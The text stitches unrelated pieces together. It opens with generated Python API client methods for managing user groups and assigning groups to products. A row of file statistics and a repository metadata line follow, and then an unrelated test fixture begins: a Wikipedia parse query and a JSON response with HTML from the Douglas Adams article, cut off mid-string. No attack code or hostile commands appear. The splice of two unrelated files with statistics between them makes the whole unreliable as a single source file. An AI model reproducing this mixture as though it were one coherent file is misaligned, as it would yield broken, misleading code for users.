This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_users_put_with_http_info(api_token, group, assign_user_group_request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str group: name of the group (required)
:param AssignUserGroupRequestBody assign_user_group_request_body: JSON object that contains information to assign users to group (required)
:return: InlineResponse201
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_token', 'group', 'assign_user_group_request_body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_group_users_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_token' is set
if ('api_token' not in params or
params['api_token'] is None):
raise ValueError("Missing the required parameter `api_token` when calling `groups_group_users_put`") # noqa: E501
# verify the required parameter 'group' is set
if ('group' not in params or
params['group'] is None):
raise ValueError("Missing the required parameter `group` when calling `groups_group_users_put`") # noqa: E501
# verify the required parameter 'assign_user_group_request_body' is set
if ('assign_user_group_request_body' not in params or
params['assign_user_group_request_body'] is None):
raise ValueError("Missing the required parameter `assign_user_group_request_body` when calling `groups_group_users_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group' in params:
path_params['group'] = params['group'] # noqa: E501
query_params = []
header_params = {}
if 'api_token' in params:
header_params['api-token'] = params['api_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'assign_user_group_request_body' in params:
body_params = params['assign_user_group_request_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/groups/{group}/users', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse201', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def groups_group_users_user_delete(self, api_token, group, user, **kwargs): # noqa: E501
"""Removes a user from a group # noqa: E501
Unassign a user from a group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted, or - To have the permission **MANAGE_USERS_BU** granted. With this permission you will be able to unassign user from a group, **if you belong to this group**. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_users_user_delete(api_token, group, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str group: name of the group (required)
:param str user: user to be removed from group (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.groups_group_users_user_delete_with_http_info(api_token, group, user, **kwargs) # noqa: E501
else:
(data) = self.groups_group_users_user_delete_with_http_info(api_token, group, user, **kwargs) # noqa: E501
return data
def groups_group_users_user_delete_with_http_info(self, api_token, group, user, **kwargs): # noqa: E501
"""Removes a user from a group # noqa: E501
Unassign a user from a group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted, or - To have the permission **MANAGE_USERS_BU** granted. With this permission you will be able to unassign user from a group, **if you belong to this group**. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_users_user_delete_with_http_info(api_token, group, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str group: name of the group (required)
:param str user: user to be removed from group (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_token', 'group', 'user'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_group_users_user_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_token' is set
if ('api_token' not in params or
params['api_token'] is None):
raise ValueError("Missing the required parameter `api_token` when calling `groups_group_users_user_delete`") # noqa: E501
# verify the required parameter 'group' is set
if ('group' not in params or
params['group'] is None):
raise ValueError("Missing the required parameter `group` when calling `groups_group_users_user_delete`") # noqa: E501
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `groups_group_users_user_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group' in params:
path_params['group'] = params['group'] # noqa: E501
if 'user' in params:
path_params['user'] = params['user'] # noqa: E501
query_params = []
header_params = {}
if 'api_token' in params:
header_params['api-token'] = params['api_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/groups/{group}/users/{user}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def groups_post(self, api_token, create_group_request_body, **kwargs): # noqa: E501
"""Creates a new user group # noqa: E501
Creates a new user group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_post(api_token, create_group_request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param CreateGroupRequestBody create_group_request_body: JSON data that contains information of the fields (required)
:return: Group
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.groups_post_with_http_info(api_token, create_group_request_body, **kwargs) # noqa: E501
else:
(data) = self.groups_post_with_http_info(api_token, create_group_request_body, **kwargs) # noqa: E501
return data
def groups_post_with_http_info(self, api_token, create_group_request_body, **kwargs): # noqa: E501
"""Creates a new user group # noqa: E501
Creates a new user group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_post_with_http_info(api_token, create_group_request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param CreateGroupRequestBody create_group_request_body: JSON data that contains information of the fields (required)
:return: Group
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_token', 'create_group_request_body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_token' is set
if ('api_token' not in params or
params['api_token'] is None):
raise ValueError("Missing the required parameter `api_token` when calling `groups_post`") # noqa: E501
# verify the required parameter 'create_group_request_body' is set
if ('create_group_request_body' not in params or
params['create_group_request_body'] is None):
raise ValueError("Missing the required parameter `create_group_request_body` when calling `groups_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'api_token' in params:
header_params['api-token'] = params['api_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'create_group_request_body' in params:
body_params = params['create_group_request_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/groups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Group', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def products_ref_groups_delete(self, api_token, ref, unassign_groups_product_request_body, **kwargs): # noqa: E501
"""Unassigns a list of user groups from a product. # noqa: E501
Unassigns a list of user groups from a product. Conditions to be able to perform the action: - To have the permission **PRODUCT_UPDATE** granted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.products_ref_groups_delete(api_token, ref, unassign_groups_product_request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str ref: Reference for product (required)
:param UnassignGroupsProductRequestBody unassign_groups_product_request_body: JSON object that contains information to unassign groups from a product (required)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.products_ref_groups_delete_with_http_info(api_token, ref, unassign_groups_product_request_body, **kwargs) # noqa: E501
else:
(data) = self.products_ref_groups_delete_with_http_info(api_token, ref, unassign_groups_product_request_body, **kwargs) # noqa: E501
return data
def products_ref_groups_delete_with_http_info(self, api_token, ref, unassign_groups_product_request_body, **kwargs): # noqa: E501
"""Unassigns a list of user groups from a product. # noqa: E501
Unassigns a list of user groups from a product. Conditions to be able to perform the action: - To have the permission **PRODUCT_UPDATE** granted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.products_ref_groups_delete_with_http_info(api_token, ref, unassign_groups_product_request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str ref: Reference for product (required)
:param UnassignGroupsProductRequestBody unassign_groups_product_request_body: JSON object that contains information to unassign groups from a product (required)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_token', 'ref', 'unassign_groups_product_request_body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method products_ref_groups_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_token' is set
if ('api_token' not in params or
params['api_token'] is None):
raise ValueError("Missing the required parameter `api_token` when calling `products_ref_groups_delete`") # noqa: E501
# verify the required parameter 'ref' is set
if ('ref' not in params or
params['ref'] is None):
raise ValueError("Missing the required parameter `ref` when calling `products_ref_groups_delete`") # noqa: E501
# verify the required parameter 'unassign_groups_product_request_body' is set
if ('unassign_groups_product_request_body' not in params or
params['unassign_groups_product_request_body'] is None):
raise ValueError("Missing the required parameter `unassign_groups_product_request_body` when calling `products_ref_groups_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'ref' in params:
path_params['ref'] = params['ref'] # noqa: E501
query_params = []
header_params = {}
if 'api_token' in params:
header_params['api-token'] = params['api_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'unassign_groups_product_request_body' in params:
body_params = params['unassign_groups_product_request_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/products/{ref}/groups', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def products_ref_groups_get(self, api_token, ref, **kwargs): # noqa: E501
"""List all groups assigned to a product # noqa: E501
List all groups assigned to a product. Conditions to be able to perform the action: - If the caller has the PRODUCTS_LIST_ALL permission then all products can be queried without restriction. - Without the PRODUCTS_LIST_ALL permission, the call will only return the groups if the caller belongs to that product. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.products_ref_groups_get(api_token, ref, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str ref: Reference to product (required)
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.products_ref_groups_get_with_http_info(api_token, ref, **kwargs) # noqa: E501
else:
(data) = self.products_ref_groups_get_with_http_info(api_token, ref, **kwargs) # noqa: E501
return data
def products_ref_groups_get_with_http_info(self, api_token, ref, **kwargs): # noqa: E501
"""List all groups assigned to a product # noqa: E501
List all groups assigned to a product. Conditions to be able to perform the action: - If the caller has the PRODUCTS_LIST_ALL permission then all products can be queried without restriction. - Without the PRODUCTS_LIST_ALL permission, the call will only return the groups if the caller belongs to that product. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.products_ref_groups_get_with_http_info(api_token, ref, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str ref: Reference to product (required)
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_token', 'ref'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method products_ref_groups_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_token' is set
if ('api_token' not in params or
params['api_token'] is None):
raise ValueError("Missing the required parameter `api_token` when calling `products_ref_groups_get`") # noqa: E501
# verify the required parameter 'ref' is set
if ('ref' not in params or
params['ref'] is None):
raise ValueError("Missing the required parameter `ref` when calling `products_ref_groups_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'ref' in params:
path_params['ref'] = params['ref'] # noqa: E501
query_params = []
header_params = {}
if 'api_token' in params:
header_params['api-token'] = params['api_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/products/{ref}/groups', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[str]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def products_ref_groups_put(self, api_token, ref, assign_groups_product_request_body, **kwargs): # noqa: E501
"""Assigns groups of users to a product. # noqa: E501
Assigns groups of users to a product. Conditions to be able to perform the action: - To have the permission **PRODUCT_UPDATE** granted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.products_ref_groups_put(api_token, ref, assign_groups_product_request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str ref: Reference for product (required)
:param AssignGroupsProductRequestBody assign_groups_product_request_body: JSON object that contains information to assign groups to product (required)
:return: ProductShortGroups
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.products_ref_groups_put_with_http_info(api_token, ref, assign_groups_product_request_body, **kwargs) # noqa: E501
else:
(data) = self.products_ref_groups_put_with_http_info(api_token, ref, assign_groups_product_request_body, **kwargs) # noqa: E501
return data
def products_ref_groups_put_with_http_info(self, api_token, ref, assign_groups_product_request_body, **kwargs): # noqa: E501
"""Assigns groups of users to a product. # noqa: E501
Assigns groups of users to a product. Conditions to be able to perform the action: - To have the permission **PRODUCT_UPDATE** granted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.products_ref_groups_put_with_http_info(api_token, ref, assign_groups_product_request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str ref: Reference for product (required)
:param AssignGroupsProductRequestBody assign_groups_product_request_body: JSON object that contains information to assign groups to product (required)
:return: ProductShortGroups
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_token', 'ref', 'assign_groups_product_request_body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method products_ref_groups_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_token' is set
if ('api_token' not in params or
params['api_token'] is None):
raise ValueError("Missing the required parameter `api_token` when calling `products_ref_groups_put`") # noqa: E501
# verify the required parameter 'ref' is set
if ('ref' not in params or
params['ref'] is None):
raise ValueError("Missing the required parameter `ref` when calling `products_ref_groups_put`") # noqa: E501
# verify the required parameter 'assign_groups_product_request_body' is set
if ('assign_groups_product_request_body' not in params or
params['assign_groups_product_request_body'] is None):
raise ValueError("Missing the required parameter `assign_groups_product_request_body` when calling `products_ref_groups_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'ref' in params:
path_params['ref'] = params['ref'] # noqa: E501
query_params = []
header_params = {}
if 'api_token' in params:
header_params['api-token'] = params['api_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'assign_groups_product_request_body' in params:
body_params = params['assign_groups_product_request_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/products/{ref}/groups', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductShortGroups', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 47.106049 | 353 | 0.639445 | 7,760 | 63,075 | 4.936211 | 0.026546 | 0.044067 | 0.025062 | 0.022556 | 0.985746 | 0.982613 | 0.977105 | 0.970213 | 0.948597 | 0.936849 | 0 | 0.014424 | 0.27675 | 63,075 | 1,338 | 354 | 47.141256 | 0.825248 | 0.382418 | 0 | 0.77459 | 1 | 0 | 0.222868 | 0.080733 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034153 | false | 0 | 0.005464 | 0 | 0.090164 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0041e3113feab1f0a26d748f99f017bb54b91e37 | 399,051 | py | Python | tests/parse.py | matthewgehring/wptools | 788cdc2078696dacb14652d5f2ad098a585e4763 | [
"MIT"
] | 482 | 2015-04-13T23:43:42.000Z | 2022-03-31T14:44:50.000Z | tests/parse.py | matthewgehring/wptools | 788cdc2078696dacb14652d5f2ad098a585e4763 | [
"MIT"
] | 168 | 2016-01-06T14:30:05.000Z | 2022-02-17T22:14:36.000Z | tests/parse.py | matthewgehring/wptools | 788cdc2078696dacb14652d5f2ad098a585e4763 | [
"MIT"
] | 80 | 2015-05-03T18:10:58.000Z | 2022-02-17T22:54:25.000Z | # -*- coding:utf-8 -*-
query = 'https://en.wikipedia.org/w/api.php?action=parse&contentmodel=text&disableeditsection=&disablelimitreport=&disabletoc=&format=json&formatversion=2&prop=text|iwlinks|parsetree|wikitext|displaytitle|properties&pageid=8091'
response = r"""
{
"parse": {
"title": "Douglas Adams",
"pageid": 8091,
"text": "<div role=\"note\" class=\"hatnote\">For other people named Douglas Adams, see <a href=\"/wiki/Douglas_Adams_(disambiguation)\" class=\"mw-disambig\" title=\"Douglas Adams (disambiguation)\">Douglas Adams (disambiguation)</a>.</div>\n<table class=\"infobox vcard\" style=\"width:22em\">\n<tr>\n<th colspan=\"2\" style=\"text-align:center;font-size:125%;font-weight:bold\"><span class=\"fn\">Douglas Adams</span></th>\n</tr>\n<tr>\n<td colspan=\"2\" style=\"text-align:center\"><a href=\"/wiki/File:Douglas_adams_portrait_cropped.jpg\" class=\"image\"><img alt=\"Douglas adams portrait cropped.jpg\" src=\"//upload.wikimedia.org/wikipedia/commons/thumb/c/c0/Douglas_adams_portrait_cropped.jpg/220px-Douglas_adams_portrait_cropped.jpg\" width=\"220\" height=\"255\" srcset=\"//upload.wikimedia.org/wikipedia/commons/thumb/c/c0/Douglas_adams_portrait_cropped.jpg/330px-Douglas_adams_portrait_cropped.jpg 1.5x, //upload.wikimedia.org/wikipedia/commons/c/c0/Douglas_adams_portrait_cropped.jpg 2x\" data-file-width=\"333\" data-file-height=\"386\" /></a></td>\n</tr>\n<tr>\n<th scope=\"row\" style=\"padding-top:0.225em;line-height:1.1em;padding-right:0.65em;\">Born</th>\n<td style=\"line-height:1.4em;\">Douglas Noel Adams<br />\n<span style=\"display:none\">(<span class=\"bday\">1952-03-11</span>)</span>11 March 1952<br />\n<a href=\"/wiki/Cambridge\" title=\"Cambridge\">Cambridge</a>, England</td>\n</tr>\n<tr>\n<th scope=\"row\" style=\"padding-top:0.225em;line-height:1.1em;padding-right:0.65em;\">Died</th>\n<td style=\"line-height:1.4em;\">11 May 2001<span style=\"display:none\">(<span class=\"dday deathdate\">2001-05-11</span>)</span> (aged 49)<br />\n<a href=\"/wiki/Montecito,_California\" title=\"Montecito, California\">Montecito, California</a>, U.S.</td>\n</tr>\n<tr>\n<th scope=\"row\" style=\"padding-top:0.225em;line-height:1.1em;padding-right:0.65em;\">Resting place</th>\n<td style=\"line-height:1.4em;\"><a href=\"/wiki/Highgate_Cemetery\" title=\"Highgate Cemetery\">Highgate Cemetery</a>, London, England</td>\n</tr>\n<tr>\n<th scope=\"row\" style=\"padding-top:0.225em;line-height:1.1em;padding-right:0.65em;\">Occupation</th>\n<td class=\"role\" style=\"line-height:1.4em;\">Writer</td>\n</tr>\n<tr>\n<th scope=\"row\" style=\"padding-top:0.225em;line-height:1.1em;padding-right:0.65em;\">Alma mater</th>\n<td style=\"line-height:1.4em;\"><a href=\"/wiki/St_John%27s_College,_Cambridge\" title=\"St John's College, Cambridge\">St John's College, Cambridge</a></td>\n</tr>\n<tr>\n<th scope=\"row\" style=\"padding-top:0.225em;line-height:1.1em;padding-right:0.65em;\">Genre</th>\n<td class=\"category\" style=\"line-height:1.4em;\">Science fiction, comedy, satire</td>\n</tr>\n<tr>\n<th colspan=\"2\" style=\"text-align:center\">Website</th>\n</tr>\n<tr>\n<td colspan=\"2\" style=\"text-align:center;line-height:1.4em;\"><span class=\"url\"><a rel=\"nofollow\" class=\"external text\" href=\"http://douglasadams.com/\">douglasadams<wbr />.com</a></span></td>\n</tr>\n</table>\n<p><b>Douglas Noel Adams</b> (11 March 1952 – 11 May 2001) was an <a href=\"/wiki/English_people\" title=\"English people\">English</a> <a href=\"/wiki/Author\" title=\"Author\">author</a>, <a href=\"/wiki/Scriptwriter\" class=\"mw-redirect\" title=\"Scriptwriter\">scriptwriter</a>, <a href=\"/wiki/Essayist\" class=\"mw-redirect\" title=\"Essayist\">essayist</a>, <a href=\"/wiki/List_of_humorists\" title=\"List of humorists\">humourist</a>, <a href=\"/wiki/Satirist\" class=\"mw-redirect\" title=\"Satirist\">satirist</a> and <a href=\"/wiki/Dramatist\" class=\"mw-redirect\" title=\"Dramatist\">dramatist</a>.</p>\n<p>Adams is best known as the author of <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"The Hitchhiker's Guide to the Galaxy\">The Hitchhiker's Guide to the Galaxy</a></i>, which originated in 1978 as a BBC <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(radio_series)\" title=\"The Hitchhiker's Guide to the Galaxy (radio series)\">radio comedy</a> before developing into a \"trilogy\" of five books that sold more than 15 million copies in his lifetime and generated a <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(TV_series)\" title=\"The Hitchhiker's Guide to the Galaxy (TV series)\">television series</a>, several stage plays, comics, a <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(computer_game)\" class=\"mw-redirect\" title=\"The Hitchhiker's Guide to the Galaxy (computer game)\">computer game</a>, and in 2005 a <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(film)\" title=\"The Hitchhiker's Guide to the Galaxy (film)\">feature film</a>. Adams's contribution to UK radio is commemorated in <a href=\"/wiki/Radio_Academy\" title=\"Radio Academy\">The Radio Academy</a>'s Hall of Fame.<sup id=\"cite_ref-radioacad_1-0\" class=\"reference\"><a href=\"#cite_note-radioacad-1\">[1]</a></sup></p>\n<p>Adams also wrote <i><a href=\"/wiki/Dirk_Gently%27s_Holistic_Detective_Agency\" title=\"Dirk Gently's Holistic Detective Agency\">Dirk Gently's Holistic Detective Agency</a></i> (1987) and <i><a href=\"/wiki/The_Long_Dark_Tea-Time_of_the_Soul\" title=\"The Long Dark Tea-Time of the Soul\">The Long Dark Tea-Time of the Soul</a></i> (1988), and co-wrote <i><a href=\"/wiki/The_Meaning_of_Liff\" title=\"The Meaning of Liff\">The Meaning of Liff</a></i> (1983), <i><a href=\"/wiki/The_Deeper_Meaning_of_Liff\" class=\"mw-redirect\" title=\"The Deeper Meaning of Liff\">The Deeper Meaning of Liff</a></i> (1990), <i><a href=\"/wiki/Last_Chance_to_See\" title=\"Last Chance to See\">Last Chance to See</a></i> (1990), and three stories for the television series <i><a href=\"/wiki/Doctor_Who\" title=\"Doctor Who\">Doctor Who</a></i>; he also served as <a href=\"/wiki/Script_editor\" title=\"Script editor\">script editor</a> for the show's seventeenth season in 1979. A posthumous collection of his works, including an unfinished novel, was published as <i><a href=\"/wiki/The_Salmon_of_Doubt\" title=\"The Salmon of Doubt\">The Salmon of Doubt</a></i> in 2002.</p>\n<p>Adams was known as an advocate for environmentalism and <a href=\"/wiki/Conservation_movement\" title=\"Conservation movement\">conservation</a>, as a lover of fast cars, cameras, <a href=\"/wiki/Technological_innovation\" class=\"mw-redirect\" title=\"Technological innovation\">technological innovation</a> and the <a href=\"/wiki/Apple_Macintosh\" class=\"mw-redirect\" title=\"Apple Macintosh\">Apple Macintosh</a>, and as a \"devout <a href=\"/wiki/Atheist\" class=\"mw-redirect\" title=\"Atheist\">atheist</a>\".</p>\n<p></p>\n<h2><span class=\"mw-headline\" id=\"Early_life\">Early life</span></h2>\n<p>Adams was born on 11 March 1952 to Janet (née Donovan; 1927–2016) and Christopher Douglas Adams (1927–1985) in <a href=\"/wiki/Cambridge\" title=\"Cambridge\">Cambridge</a>, England.<sup id=\"cite_ref-ODNB_2-0\" class=\"reference\"><a href=\"#cite_note-ODNB-2\">[2]</a></sup> The following year, <a href=\"/wiki/James_D._Watson\" class=\"mw-redirect\" title=\"James D. Watson\">Watson</a> and <a href=\"/wiki/Francis_Crick\" title=\"Francis Crick\">Crick</a> famously first modelled <a href=\"/wiki/DNA\" title=\"DNA\">DNA</a> at <a href=\"/wiki/Cambridge_University\" class=\"mw-redirect\" title=\"Cambridge University\">Cambridge University</a>, leading Adams to later quip he was DNA in Cambridge months earlier. The family moved to <a href=\"/wiki/East_End_of_London\" title=\"East End of London\">East London</a> a few months after his birth, where his sister, Susan, was born three years later.<sup id=\"cite_ref-Adams_xix_3-0\" class=\"reference\"><a href=\"#cite_note-Adams_xix-3\">[3]</a></sup> His parents divorced in 1957; Douglas, Susan, and their mother moved to an <a href=\"/wiki/RSPCA\" class=\"mw-redirect\" title=\"RSPCA\">RSPCA</a> animal shelter in <a href=\"/wiki/Brentwood,_Essex\" title=\"Brentwood, Essex\">Brentwood, Essex</a>, run by his maternal grandparents.<sup id=\"cite_ref-4\" class=\"reference\"><a href=\"#cite_note-4\">[4]</a></sup></p>\n<h3><span class=\"mw-headline\" id=\"Education\">Education</span></h3>\n<p>Adams attended Primrose Hill Primary School in <a href=\"/wiki/Brentwood,_Essex\" title=\"Brentwood, Essex\">Brentwood</a>. At nine, he passed the entrance exam for <a href=\"/wiki/Brentwood_School_(Essex)\" class=\"mw-redirect\" title=\"Brentwood School (Essex)\">Brentwood School</a>, an independent school whose alumni include <a href=\"/wiki/Robin_Day\" title=\"Robin Day\">Robin Day</a>, <a href=\"/wiki/Jack_Straw\" title=\"Jack Straw\">Jack Straw</a>, <a href=\"/wiki/Noel_Edmonds\" title=\"Noel Edmonds\">Noel Edmonds</a>, and <a href=\"/wiki/David_Irving\" title=\"David Irving\">David Irving</a>. <a href=\"/wiki/Griff_Rhys_Jones\" title=\"Griff Rhys Jones\">Griff Rhys Jones</a> was a year below him, and he was in the same class as <a href=\"/wiki/Stuckism\" title=\"Stuckism\">Stuckist</a> artist <a href=\"/wiki/Charles_Thomson_(artist)\" title=\"Charles Thomson (artist)\">Charles Thomson</a>. He attended the <a href=\"/wiki/Preparatory_school_(UK)\" class=\"mw-redirect\" title=\"Preparatory school (UK)\">prep school</a> from 1959 to 